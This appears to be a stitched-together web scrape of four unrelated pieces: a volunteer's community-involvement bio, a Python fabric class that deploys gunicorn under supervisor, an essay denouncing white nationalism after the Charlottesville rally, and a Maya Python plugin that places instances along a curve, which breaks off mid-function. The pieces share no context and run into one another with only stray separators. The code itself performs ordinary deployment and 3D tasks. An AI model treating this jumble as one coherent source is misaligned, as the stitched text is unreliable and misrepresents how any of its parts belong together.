- Dragon Boat Festival for Barrie Public Library, 2005, 2006 & 2007.
- Big Brothers/Sisters Bowl for Kids, 2003 to 2013.
- Christmas Cheer, 2006, 2007, 2008, and 2009.
- Volunteer "Elf" for Santa Claus letter writing campaign through Canada Post.
I am actively involved in the local business community and am a member and past director of the Alcona Business Association.
Need an Air Miles Card? Get it here.
Help Send a Kid to Camp. Easter Seal Canada. |
import os
from fab_deploy2.base import gunicorn as base_gunicorn
from fab_deploy2.tasks import task_method
from fab_deploy2 import functions
from fabric.api import sudo, env
from fabric.contrib.files import append
class Gunicorn(base_gunicorn.Gunicorn):
"""
Install gunicorn and set it up with supervisor.
"""
user = 'www-data'
group = 'www-data'
daemonize = False
conf_location = '/etc/supervisor/conf.d/'
@task_method
def start(self):
functions.execute_on_host('utils.start_or_restart_supervisor', name=self.gunicorn_name)
@task_method
def stop(self):
sudo('supervisorctl stop %s' % self.gunicorn_name)
def _setup_service(self, env_value=None):
installed = functions.execute_on_host('utils.install_package', package_name='supervisor')
if installed:
sudo('update-rc.d supervisor defaults')
if self.conf_location:
gunicorn_conf = os.path.join(env.configs_path,
"gunicorn/supervisor_{0}.conf".format(self.gunicorn_name))
sudo('ln -sf {0} {1}'.format(gunicorn_conf, self.conf_location))
def upload_templates(self):
context = super(Gunicorn, self).upload_templates()
functions.render_template("gunicorn/supervisor_gunicorn.conf",
os.path.join(env.configs_path, "gunicorn/supervisor_{0}.conf".format(self.gunicorn_name)),
context=context)
return context
def _setup_rotate(self, path):
text = [
"%s {" % path,
" copytruncate",
" size 1M",
" rotate 5",
"}"]
sudo('touch /etc/logrotate.d/%s.conf' % self.gunicorn_name)
for t in text:
append('/etc/logrotate.d/%s.conf' % self.gunicorn_name,
t, use_sudo=True)
Gunicorn().as_tasks()
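# Rough usage sketch (an assumption: ``as_tasks()`` registers the
# @task_method-decorated methods as namespaced fabric tasks; the exact task
# names depend on fab_deploy2's registration):
#
#     fab -H deploy@example.com gunicorn.stop
#     fab -H deploy@example.com gunicorn.start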
|
Ten days after the white nationalist-inspired Unite the Right rally in Charlottesville, where my family resides, I snapped this selfie: "Me & Lee."
As if sensing the metaphorical moment, the Robert E. Lee statue appears to be hovering, casting its shadow on town, state, and country.
Among the "alt-right" crowd, it is hard for me to find any actual, comprehensive vision to heal—to mend the fissures and fractures of American society; to redeem the breadth and width of our social story.
There is—devastatingly—no love outside oneself, one's race, one's culture.
There is only misguided intellect masquerading and marauding as cultural grievance and the naked will to power.
There are only the recycled temptations of social Darwinism's ever-present end-game: competition, conflict, supremacy, exclusion.
Now, like many Americans, I continue to process August 12th and its aftermath.
On the night Donald Trump won America, CNN's Van Jones unleashed his now-famous "whitelash" comment—a visceral analysis of the U.S. election results.
Jones's three-sentence commentary channeled the larger forces of globalization and multiculturalism as much as it did race/racism in America's social history and ongoing story.
But, after Charlottesville, with many Americans appalled, anguished, angered, all of the above, you can forgive the lack of discussion on, say, the strengths and weaknesses of the global economic order.
Whitelash had indeed vociferously announced the above-ground presence of its militant faction—with the tacit support and seeming approval of the White Man in the White House.
...a direct consequence of long-simmering tensions in American race relations and our national unwillingness to state unequivocally that the Confederacy was the villain of the Civil War, enabling revisionist histories that cast it as the victim. For all our protestations that this is not the America we know, this brand of racism and white supremacism is in our country’s very DNA.
At the direction of the Charlottesville City Council, the Robert E. Lee statue in Emancipation Park was shrouded on August 23, intended to represent the city's mourning of Heather Heyer.
Notwithstanding the incessant volume emanating from the diatribes of a gazillion Facebook posts, this political hubbub and its immense social moment is not about preserving monuments.
The battle has never been about the statues themselves.
Put frankly, as Ed Kilgore writes, this is about "the fierce, century-long effort of the Southern ruling class to normalize white racism so long as [it doesn't] degenerate into extralegal violence."
To keep white racism normal.
Whatever color you are, one should not need an empathy gene to feel this cut against the soul.
A white nationalist demonstrator struck a defiant pose at the Unite the Right rally in Charlottesville.
Leaving to the side the blatant co-opting of Nazi rhetoric and imagery for the sake of its own budding narrative, "alt-right" ideology has as its real white noise the heritage that stands in for hate.
Or, seen less dimly now: the hate that uses heritage—like a freaking tool.
In fact, I would venture a wager that most of the fellas gathering under the big-tent "alt-right" couldn't care less about the Lost Cause of the Confederacy.
They are not concerned in the least with Southern identity.
For white nationalists and neo-Nazis, there is no cause greater than white.
No identity (Southern, American, Christian) matters more than white.
Be assured, they just want to use your Confederate love tonight. |
import sys
import math
import random
import traceback
import maya.mel as mel
import pymel.core as pm
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import maya.OpenMayaRender as OpenMayaRender
kPluginCmdName = "instanceAlongCurve"
kPluginNodeName = 'instanceAlongCurveLocator'
kPluginNodeClassify = 'utility/general'
kPluginNodeId = OpenMaya.MTypeId( 0x55555 )
# InstanceAlongCurve v1.0.2
class instanceAlongCurveLocator(OpenMayaMPx.MPxLocatorNode):
# Simple container class for compound vector attributes
class Vector3CompoundAttribute(object):
def __init__(self):
self.compound = OpenMaya.MObject()
self.x = OpenMaya.MObject()
self.y = OpenMaya.MObject()
self.z = OpenMaya.MObject()
# Input attributes
inputCurveAttr = OpenMaya.MObject()
inputTransformAttr = OpenMaya.MObject()
inputShadingGroupAttr = OpenMaya.MObject()
# Instance count related attributes
instanceCountAttr = OpenMaya.MObject()
instancingModeAttr = OpenMaya.MObject()
instanceLengthAttr = OpenMaya.MObject()
maxInstancesByLengthAttr = OpenMaya.MObject()
displayTypeAttr = OpenMaya.MObject()
bboxAttr = OpenMaya.MObject()
orientationModeAttr = OpenMaya.MObject()
inputOrientationAxisAttr = Vector3CompoundAttribute()
class RampAttributes(object):
def __init__(self):
self.ramp = OpenMaya.MObject() # normalized ramp
self.rampOffset = OpenMaya.MObject() # evaluation offset for ramp
self.rampAxis = OpenMaya.MObject() # ramp normalized axis
self.rampAmplitude = OpenMaya.MObject() # ramp amplitude
self.rampRandomAmplitude = OpenMaya.MObject() # ramp random amplitude
# Simple container class for compound vector attributes
class RampValueContainer(object):
def __init__(self, mObject, dataBlock, rampAttr, normalize):
self.ramp = OpenMaya.MRampAttribute(OpenMaya.MPlug(mObject, rampAttr.ramp))
self.rampOffset = dataBlock.inputValue(rampAttr.rampOffset).asFloat()
self.rampRandomAmplitude = dataBlock.inputValue(rampAttr.rampRandomAmplitude).asFloat()
self.rampAmplitude = dataBlock.inputValue(rampAttr.rampAmplitude).asFloat()
if normalize:
self.rampAxis = dataBlock.inputValue(rampAttr.rampAxis.compound).asVector().normal()
else:
self.rampAxis = dataBlock.inputValue(rampAttr.rampAxis.compound).asVector()
# Ramp attributes
positionRampAttr = RampAttributes()
rotationRampAttr = RampAttributes()
scaleRampAttr = RampAttributes()
# Output vectors
outputTranslationAttr = Vector3CompoundAttribute()
outputRotationAttr = Vector3CompoundAttribute()
outputScaleAttr = Vector3CompoundAttribute()
def __init__(self):
OpenMayaMPx.MPxLocatorNode.__init__(self)
# This method is not being called?
# def __del__(self):
# print "CALLBACK: " + str(callbackId)
# OpenMaya.MNodeMessage.removeCallback(self.callbackId)
# OpenMayaMPx.MPxLocatorNode.__del__(self)
def postConstructor(self):
OpenMaya.MFnDependencyNode(self.thisMObject()).setName("instanceAlongCurveLocatorShape#")
self.callbackId = OpenMaya.MNodeMessage.addAttributeChangedCallback(self.thisMObject(), self.attrChangeCallback)
self.updateInstanceConnections()
# Find original SG to reassign it to instance
def getShadingGroup(self):
inputSGPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputShadingGroupAttr)
sgNode = self.getSingleSourceObjectFromPlug(inputSGPlug)
if sgNode is not None and sgNode.hasFn(OpenMaya.MFn.kSet):
return OpenMaya.MFnSet(sgNode)
return None
def assignShadingGroup(self, fnDagNode):
fnSet = self.getShadingGroup()
if fnSet is not None:
# Easiest, cleanest way seems to be calling MEL.
# sets command handles everything, even nested instanced dag paths
mdgm = OpenMaya.MDGModifier()
mdgm.commandToExecute("sets -e -nw -fe " + fnSet.name() + " " + fnDagNode.name())
mdgm.doIt()
# Helper function to get an array of available logical indices from the sparse array
# TODO: maybe it can be precalculated?
def getAvailableLogicalIndices(self, plug, numIndices):
# Allocate and initialize
outIndices = OpenMaya.MIntArray(numIndices)
indices = OpenMaya.MIntArray(plug.numElements())
plug.getExistingArrayAttributeIndices(indices)
currentAvailableIndex = 0
indicesFound = 0
        # Assuming indices are SORTED :)
        for i in indices:
            connectedPlug = plug.elementByLogicalIndex(i).isConnected()
            # Iteratively find available indices in the sparse array
            while i > currentAvailableIndex and indicesFound < numIndices:
                outIndices[indicesFound] = currentAvailableIndex
                indicesFound += 1
                currentAvailableIndex += 1
            # Check against this index: add it if it is not connected,
            # otherwise just advance past it (a connected index is taken)
            if i == currentAvailableIndex:
                if not connectedPlug and indicesFound < numIndices:
                    outIndices[indicesFound] = currentAvailableIndex
                    indicesFound += 1
                currentAvailableIndex += 1
            if indicesFound == numIndices:
                return outIndices
# Fill remaining expected indices
for i in xrange(indicesFound, numIndices):
outIndices[i] = currentAvailableIndex
currentAvailableIndex += 1
return outIndices
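    # For example (illustrative): if the existing connected logical indices are
    # [0, 2, 5] and numIndices is 4, the method above returns [1, 3, 4, 6].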
def getNodeTransformFn(self):
dagNode = OpenMaya.MFnDagNode(self.thisMObject())
dagPath = OpenMaya.MDagPath()
dagNode.getPath(dagPath)
return OpenMaya.MFnDagNode(dagPath.transform())
def updateInstanceConnections(self):
# If the locator is being instanced, just stop updating its children.
# This is to prevent losing references to the locator instances' children
# If you want to change this locator, prepare the source before instantiating
if OpenMaya.MFnDagNode(self.thisMObject()).isInstanced():
return OpenMaya.kUnknownParameter
# Plugs
outputTranslationPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.outputTranslationAttr.compound)
outputRotationPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.outputRotationAttr.compound)
outputScalePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.outputScaleAttr.compound)
expectedInstanceCount = self.getInstanceCountByMode()
numConnectedElements = outputTranslationPlug.numConnectedElements()
# Only instance if we are missing elements
# TODO: handle mismatches in translation/rotation plug connected elements (user deleted a plug? use connectionBroken method?)
if numConnectedElements < expectedInstanceCount:
inputTransformFn = self.getInputTransformFn()
if inputTransformFn is not None:
transformFn = self.getNodeTransformFn()
newInstancesCount = expectedInstanceCount - numConnectedElements
availableIndices = self.getAvailableLogicalIndices(outputTranslationPlug, newInstancesCount)
displayPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.displayTypeAttr)
LODPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.bboxAttr)
mdgModifier = OpenMaya.MDagModifier()
for i in availableIndices:
# Instance transform
# InstanceLeaf must be set to False to prevent crashes :)
trInstance = inputTransformFn.duplicate(True, False)
instanceFn = OpenMaya.MFnTransform(trInstance)
# Parent new instance
transformFn.addChild(trInstance)
instanceTranslatePlug = instanceFn.findPlug('translate', False)
outputTranslationPlugElement = outputTranslationPlug.elementByLogicalIndex(i)
instanceRotationPlug = instanceFn.findPlug('rotate', False)
outputRotationPlugElement = outputRotationPlug.elementByLogicalIndex(i)
instanceScalePlug = instanceFn.findPlug('scale', False)
outputScalePlugElement = outputScalePlug.elementByLogicalIndex(i)
# Enable drawing overrides
overrideEnabledPlug = instanceFn.findPlug("overrideEnabled", False)
overrideEnabledPlug.setBool(True)
instanceDisplayPlug = instanceFn.findPlug("overrideDisplayType", False)
instanceLODPlug = instanceFn.findPlug("overrideLevelOfDetail", False)
if not outputTranslationPlugElement.isConnected():
mdgModifier.connect(outputTranslationPlugElement, instanceTranslatePlug)
if not outputRotationPlugElement.isConnected():
mdgModifier.connect(outputRotationPlugElement, instanceRotationPlug)
if not outputScalePlugElement.isConnected():
mdgModifier.connect(outputScalePlugElement, instanceScalePlug)
if not instanceDisplayPlug.isConnected():
mdgModifier.connect(displayPlug, instanceDisplayPlug)
if not instanceLODPlug.isConnected():
mdgModifier.connect(LODPlug, instanceLODPlug)
mdgModifier.doIt()
# Finally, assign SG to all children
self.assignShadingGroup(transformFn)
# Remove instances if necessary
elif numConnectedElements > expectedInstanceCount:
connections = OpenMaya.MPlugArray()
toRemove = numConnectedElements - expectedInstanceCount
mdgModifier = OpenMaya.MDGModifier()
for i in xrange(toRemove):
outputTranslationPlugElement = outputTranslationPlug.connectionByPhysicalIndex(numConnectedElements - 1 - i)
outputTranslationPlugElement.connectedTo(connections, False, True)
for c in xrange(connections.length()):
mdgModifier.deleteNode(connections[c].node())
mdgModifier.doIt()
def attrChangeCallback(self, msg, plug, otherPlug, clientData):
incomingDirection = (OpenMaya.MNodeMessage.kIncomingDirection & msg) == OpenMaya.MNodeMessage.kIncomingDirection
attributeSet = (OpenMaya.MNodeMessage.kAttributeSet & msg) == OpenMaya.MNodeMessage.kAttributeSet
isCorrectAttribute = (plug.attribute() == instanceAlongCurveLocator.instanceCountAttr)
isCorrectAttribute = isCorrectAttribute or (plug.attribute() == instanceAlongCurveLocator.instancingModeAttr)
isCorrectAttribute = isCorrectAttribute or (plug.attribute() == instanceAlongCurveLocator.instanceLengthAttr)
isCorrectAttribute = isCorrectAttribute or (plug.attribute() == instanceAlongCurveLocator.maxInstancesByLengthAttr)
isCorrectNode = OpenMaya.MFnDependencyNode(plug.node()).typeName() == kPluginNodeName
try:
if isCorrectNode and isCorrectAttribute and attributeSet and incomingDirection:
self.updateInstanceConnections()
except:
sys.stderr.write('Failed trying to update instances. stack trace: \n')
sys.stderr.write(traceback.format_exc())
def getSingleSourceObjectFromPlug(self, plug):
if plug.isConnected():
# Get connected input plugs
connections = OpenMaya.MPlugArray()
plug.connectedTo(connections, True, False)
# Find input transform
if connections.length() == 1:
return connections[0].node()
return None
def getInputTransformFn(self):
inputTransformPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputTransformAttr)
transform = self.getSingleSourceObjectFromPlug(inputTransformPlug)
# Get Fn from a DAG path to get the world transformations correctly
if transform is not None and transform.hasFn(OpenMaya.MFn.kTransform):
path = OpenMaya.MDagPath()
trFn = OpenMaya.MFnDagNode(transform)
trFn.getPath(path)
return OpenMaya.MFnTransform(path)
return None
def getCurveFn(self):
inputCurvePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputCurveAttr)
curve = self.getSingleSourceObjectFromPlug(inputCurvePlug)
# Get Fn from a DAG path to get the world transformations correctly
if curve is not None:
path = OpenMaya.MDagPath()
trFn = OpenMaya.MFnDagNode(curve)
trFn.getPath(path)
path.extendToShape()
if path.node().hasFn(OpenMaya.MFn.kNurbsCurve):
return OpenMaya.MFnNurbsCurve(path)
return None
# Calculate expected instances by the instancing mode
def getInstanceCountByMode(self):
instancingModePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.instancingModeAttr)
inputCurvePlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputCurveAttr)
if inputCurvePlug.isConnected() and instancingModePlug.asInt() == 1:
instanceLengthPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.instanceLengthAttr)
maxInstancesByLengthPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.maxInstancesByLengthAttr)
curveFn = self.getCurveFn()
return min(maxInstancesByLengthPlug.asInt(), int(curveFn.length() / instanceLengthPlug.asFloat()))
instanceCountPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.instanceCountAttr)
return instanceCountPlug.asInt()
def getParamOffset(self):
p = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.distOffsetAttr)
return p.asFloat()
def getRandomizedValue(self, random, randomAmplitude, value):
return (random.random() * 2.0 - 1.0) * randomAmplitude + value
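    # e.g. getRandomizedValue(random, 0.0, v) always returns v; with amplitude
    # a it returns a uniform sample in [v - a, v + a].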
def updateInstancePositions(self, curveFn, dataBlock, count, distOffset ):
point = OpenMaya.MPoint()
curveLength = curveFn.length()
translateArrayHandle = dataBlock.outputArrayValue(instanceAlongCurveLocator.outputTranslationAttr.compound)
# Deterministic random
random.seed(count)
rampValues = instanceAlongCurveLocator.RampValueContainer(self.thisMObject(), dataBlock, instanceAlongCurveLocator.positionRampAttr, False)
# Make sure there are enough handles...
for i in xrange(min(count, translateArrayHandle.elementCount())):
rampValue = self.getRampValueAtPosition(rampValues, i, count)
dist = curveLength * (i / float(count)) + distOffset
#normalize
if( dist > 0.0 ):
while( dist > curveLength ):
dist = dist - curveLength
elif( dist < 0.0 ):
while( dist < 0.0 ):
dist = dist + curveLength
            # EP curves **really** don't like param at 0.0 (crashes)
param = max( min( curveFn.findParamFromLength( dist ), curveLength ), 0.001 )
curveFn.getPointAtParam(param, point)
try:
normal = curveFn.normal(param)
tangent = curveFn.tangent(param)
bitangent = (normal ^ tangent)
except:
print 'curveFn normal get error. param:%f/length:%f' % ( param, curveLength )
twistNormal = normal * self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.x
twistBitangent = bitangent * self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.y
twistTangent = tangent * self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.z
point += twistNormal + twistTangent + twistBitangent
translateArrayHandle.jumpToArrayElement(i)
translateHandle = translateArrayHandle.outputValue()
translateHandle.set3Double(point.x, point.y, point.z)
translateArrayHandle.setAllClean()
translateArrayHandle.setClean()
def getRampValueAtPosition(self, rampValues, i, count):
util = OpenMaya.MScriptUtil()
util.createFromDouble(0.0)
valuePtr = util.asFloatPtr()
position = math.fmod((i / float(count)) + rampValues.rampOffset, 1.0)
rampValues.ramp.getValueAtPosition(position, valuePtr)
return util.getFloat(valuePtr)
def updateInstanceScale(self, curveFn, dataBlock, count):
point = OpenMaya.MPoint()
scaleArrayHandle = dataBlock.outputArrayValue(instanceAlongCurveLocator.outputScaleAttr.compound)
# Deterministic random
random.seed(count)
rampValues = instanceAlongCurveLocator.RampValueContainer(self.thisMObject(), dataBlock, instanceAlongCurveLocator.scaleRampAttr, False)
# Make sure there are enough handles...
for i in xrange(min(count, scaleArrayHandle.elementCount())):
rampValue = self.getRampValueAtPosition(rampValues, i, count)
point.x = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.x
point.y = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.y
point.z = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.z
scaleArrayHandle.jumpToArrayElement(i)
scaleHandle = scaleArrayHandle.outputValue()
scaleHandle.set3Double(point.x, point.y, point.z)
scaleArrayHandle.setAllClean()
scaleArrayHandle.setClean()
def updateInstanceRotations(self, curveFn, dataBlock, count, distOffset ):
point = OpenMaya.MPoint()
curveLength = curveFn.length()
rotationArrayHandle = dataBlock.outputArrayValue(instanceAlongCurveLocator.outputRotationAttr.compound)
startOrientation = dataBlock.outputValue(instanceAlongCurveLocator.inputOrientationAxisAttr.compound).asVector().normal()
# Deterministic random
random.seed(count)
rampValues = instanceAlongCurveLocator.RampValueContainer(self.thisMObject(), dataBlock, instanceAlongCurveLocator.rotationRampAttr, True)
rotMode = dataBlock.inputValue(instanceAlongCurveLocator.orientationModeAttr).asInt()
inputTransformPlug = OpenMaya.MPlug(self.thisMObject(), instanceAlongCurveLocator.inputTransformAttr)
inputTransformRotation = OpenMaya.MQuaternion()
if inputTransformPlug.isConnected():
self.getInputTransformFn().getRotation(inputTransformRotation, OpenMaya.MSpace.kWorld)
for i in xrange(min(count, rotationArrayHandle.elementCount())):
rampValue = self.getRampValueAtPosition(rampValues, i, count)
dist = curveLength * (i / float(count)) + distOffset
#normalize
if( dist > 0.0 ):
while( dist > curveLength ):
dist = dist - curveLength
elif( dist < 0.0 ):
while( dist < 0.0 ):
dist = dist + curveLength
            # EP curves **really** don't like param at 0.0 (crashes)
param = max( min( curveFn.findParamFromLength( dist ), curveLength ), 0.002 )
rot = OpenMaya.MQuaternion()
try:
normal = curveFn.normal(param)
tangent = curveFn.tangent(param)
bitangent = (normal ^ tangent)
except:
print 'curveFn normal get error. param:%f/length:%f' % ( param, curveLength )
if rotMode == 1:
rot = inputTransformRotation; # No realtime preview - use an inputRotation for that?
elif rotMode == 2:
rot = startOrientation.rotateTo(normal)
elif rotMode == 3:
rot = startOrientation.rotateTo(tangent)
elif rotMode == 4:
rot = startOrientation.rotateTo(tangent)
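                # Chain mode: every other instance gets an extra 90-degree twist
                # around the tangent (pi/2 radians below).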
if i % 2 == 1:
rot *= OpenMaya.MQuaternion(3.141592 * .5, tangent)
twistNormal = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.x
twistNormal = OpenMaya.MQuaternion(twistNormal * 0.0174532925, normal) # DegToRad
twistTangent = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.y
twistTangent = OpenMaya.MQuaternion(twistTangent * 0.0174532925, tangent) # DegToRad
twistBitangent = self.getRandomizedValue(random, rampValues.rampRandomAmplitude, rampValue * rampValues.rampAmplitude) * rampValues.rampAxis.z
twistBitangent = OpenMaya.MQuaternion(twistBitangent * 0.0174532925, bitangent) # DegToRad
rot = (rot * twistNormal * twistTangent * twistBitangent).asEulerRotation().asVector()
rotationArrayHandle.jumpToArrayElement(i)
rotationHandle = rotationArrayHandle.outputValue()
rotationHandle.set3Double(rot.x, rot.y, rot.z)
rotationArrayHandle.setAllClean()
rotationArrayHandle.setClean()
def isBounded(self):
return True
def boundingBox(self):
return OpenMaya.MBoundingBox(OpenMaya.MPoint(-1,-1,-1), OpenMaya.MPoint(1,1,1))
def compute(self, plug, dataBlock):
try:
curveDataHandle = dataBlock.inputValue(instanceAlongCurveLocator.inputCurveAttr)
curve = curveDataHandle.asNurbsCurveTransformed()
if not curve.isNull():
curveFn = OpenMaya.MFnNurbsCurve(curve)
instanceCount = self.getInstanceCountByMode()
distOffset = self.getParamOffset()
if plug == instanceAlongCurveLocator.outputTranslationAttr.compound:
self.updateInstancePositions(curveFn, dataBlock, instanceCount, distOffset)
if plug == instanceAlongCurveLocator.outputRotationAttr.compound:
self.updateInstanceRotations(curveFn, dataBlock, instanceCount, distOffset)
if plug == instanceAlongCurveLocator.outputScaleAttr.compound:
self.updateInstanceScale(curveFn, dataBlock, instanceCount)
except:
sys.stderr.write('Failed trying to compute locator. stack trace: \n')
sys.stderr.write(traceback.format_exc())
return OpenMaya.kUnknownParameter
@staticmethod
def nodeCreator():
return OpenMayaMPx.asMPxPtr( instanceAlongCurveLocator() )
@classmethod
def addCompoundVector3Attribute(cls, compoundAttribute, attributeName, unitType, arrayAttr, inputAttr, defaultValue):
unitAttr = OpenMaya.MFnUnitAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
compoundAttribute.x = unitAttr.create(attributeName + "X", attributeName + "X", unitType, defaultValue.x)
unitAttr.setWritable( inputAttr )
cls.addAttribute(compoundAttribute.x)
compoundAttribute.y = unitAttr.create(attributeName + "Y", attributeName + "Y", unitType, defaultValue.y)
unitAttr.setWritable( inputAttr )
cls.addAttribute(compoundAttribute.y)
compoundAttribute.z = unitAttr.create(attributeName + "Z", attributeName + "Z", unitType, defaultValue.z)
unitAttr.setWritable( inputAttr )
cls.addAttribute(compoundAttribute.z)
# Output compound
compoundAttribute.compound = nAttr.create(attributeName, attributeName,
compoundAttribute.x, compoundAttribute.y, compoundAttribute.z)
nAttr.setWritable( inputAttr )
nAttr.setArray( arrayAttr )
nAttr.setUsesArrayDataBuilder( arrayAttr )
nAttr.setDisconnectBehavior(OpenMaya.MFnAttribute.kDelete)
cls.addAttribute(compoundAttribute.compound)
@classmethod
def addRampAttributes(cls, rampAttributes, attributeName, unitType, defaultAxisValue):
unitAttr = OpenMaya.MFnUnitAttribute()
nAttr = OpenMaya.MFnNumericAttribute()
rampAttributes.ramp = OpenMaya.MRampAttribute.createCurveRamp(attributeName + "Ramp", attributeName + "Ramp")
cls.addAttribute(rampAttributes.ramp)
rampAttributes.rampOffset = nAttr.create(attributeName + "RampOffset", attributeName + "RampOffset", OpenMaya.MFnNumericData.kFloat, 0.0)
nAttr.setKeyable( True )
cls.addAttribute( rampAttributes.rampOffset )
rampAttributes.rampAmplitude = nAttr.create(attributeName + "RampAmplitude", attributeName + "RampAmplitude", OpenMaya.MFnNumericData.kFloat, 1.0)
nAttr.setKeyable( True )
cls.addAttribute( rampAttributes.rampAmplitude )
rampAttributes.rampRandomAmplitude = nAttr.create(attributeName + "RampRandomAmplitude", attributeName + "RampRandomAmplitude", OpenMaya.MFnNumericData.kFloat, 0.0)
nAttr.setMin(0.0)
nAttr.setSoftMax(1.0)
nAttr.setKeyable( True )
cls.addAttribute( rampAttributes.rampRandomAmplitude )
cls.addCompoundVector3Attribute(rampAttributes.rampAxis, attributeName + "RampAxis", unitType, False, True, defaultAxisValue)
@staticmethod
def nodeInitializer():
# To make things more readable
node = instanceAlongCurveLocator
nAttr = OpenMaya.MFnNumericAttribute()
msgAttributeFn = OpenMaya.MFnMessageAttribute()
curveAttributeFn = OpenMaya.MFnTypedAttribute()
enumFn = OpenMaya.MFnEnumAttribute()
node.inputTransformAttr = msgAttributeFn.create("inputTransform", "it")
node.addAttribute( node.inputTransformAttr )
node.inputShadingGroupAttr = msgAttributeFn.create("inputShadingGroup", "iSG")
node.addAttribute( node.inputShadingGroupAttr )
# Input curve transform
node.inputCurveAttr = curveAttributeFn.create( 'inputCurve', 'curve', OpenMaya.MFnData.kNurbsCurve)
node.addAttribute( node.inputCurveAttr )
## Input instance count
node.instanceCountAttr = nAttr.create("instanceCount", "iic", OpenMaya.MFnNumericData.kInt, 5)
nAttr.setMin(1)
nAttr.setSoftMax(100)
nAttr.setChannelBox( False )
nAttr.setConnectable( False )
node.addAttribute( node.instanceCountAttr)
## curve parameter start offset
node.distOffsetAttr = nAttr.create("distOffset", "pOffset", OpenMaya.MFnNumericData.kFloat, 0.0)
node.addAttribute( node.distOffsetAttr )
## Max instances when defined by instance length
node.maxInstancesByLengthAttr = nAttr.create("maxInstancesByLength", "mibl", OpenMaya.MFnNumericData.kInt, 50)
nAttr.setMin(0)
nAttr.setSoftMax(200)
nAttr.setChannelBox( False )
nAttr.setConnectable( False )
node.addAttribute( node.maxInstancesByLengthAttr)
# Length between instances
node.instanceLengthAttr = nAttr.create("instanceLength", "ilength", OpenMaya.MFnNumericData.kFloat, 1.0)
nAttr.setMin(0.01)
nAttr.setSoftMax(1.0)
nAttr.setChannelBox( False )
nAttr.setConnectable( False )
node.addAttribute( node.instanceLengthAttr)
# Display override options
node.displayTypeAttr = enumFn.create('instanceDisplayType', 'idt')
enumFn.addField( "Normal", 0 );
enumFn.addField( "Template", 1 );
enumFn.addField( "Reference", 2 );
enumFn.setDefault("Reference")
node.addAttribute( node.displayTypeAttr )
# Enum for selection of instancing mode
node.instancingModeAttr = enumFn.create('instancingMode', 'instancingMode')
enumFn.addField( "Count", 0 );
enumFn.addField( "Distance", 1 );
node.addAttribute( node.instancingModeAttr )
# Enum for selection of orientation mode
node.orientationModeAttr = enumFn.create('orientationMode', 'rotMode')
enumFn.addField( "Identity", 0 );
enumFn.addField( "Copy from Source", 1 );
enumFn.addField( "Normal", 2 );
enumFn.addField( "Tangent", 3 );
enumFn.addField( "Chain", 4 );
enumFn.setDefault("Tangent")
node.addAttribute( node.orientationModeAttr )
node.addCompoundVector3Attribute(node.inputOrientationAxisAttr, "inputOrientationAxis", OpenMaya.MFnUnitAttribute.kDistance, False, True, OpenMaya.MVector(0.0, 0.0, 1.0))
node.bboxAttr = nAttr.create('instanceBoundingBox', 'ibb', OpenMaya.MFnNumericData.kBoolean)
node.addAttribute( node.bboxAttr )
node.addRampAttributes(node.positionRampAttr, "position", OpenMaya.MFnUnitAttribute.kDistance, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addRampAttributes(node.rotationRampAttr, "rotation", OpenMaya.MFnUnitAttribute.kAngle, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addRampAttributes(node.scaleRampAttr, "scale", OpenMaya.MFnUnitAttribute.kDistance, OpenMaya.MVector(1.0, 1.0, 1.0))
# Output attributes
node.addCompoundVector3Attribute(node.outputTranslationAttr, "outputTranslation", OpenMaya.MFnUnitAttribute.kDistance, True, False, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addCompoundVector3Attribute(node.outputRotationAttr, "outputRotation", OpenMaya.MFnUnitAttribute.kAngle, True, False, OpenMaya.MVector(0.0, 0.0, 0.0))
node.addCompoundVector3Attribute(node.outputScaleAttr, "outputScale", OpenMaya.MFnUnitAttribute.kDistance, True, False, OpenMaya.MVector(1.0, 1.0, 1.0))
def rampAttributeAffects(rampAttributes, affectedAttr):
node.attributeAffects( rampAttributes.ramp, affectedAttr)
node.attributeAffects( rampAttributes.rampOffset, affectedAttr)
node.attributeAffects( rampAttributes.rampAmplitude, affectedAttr)
node.attributeAffects( rampAttributes.rampAxis.compound, affectedAttr)
node.attributeAffects( rampAttributes.rampRandomAmplitude, affectedAttr)
# Translation affects
node.attributeAffects( node.inputCurveAttr, node.outputTranslationAttr.compound )
node.attributeAffects( node.instanceCountAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.instanceLengthAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.instancingModeAttr, node.outputTranslationAttr.compound)
node.attributeAffects( node.maxInstancesByLengthAttr, node.outputTranslationAttr.compound)
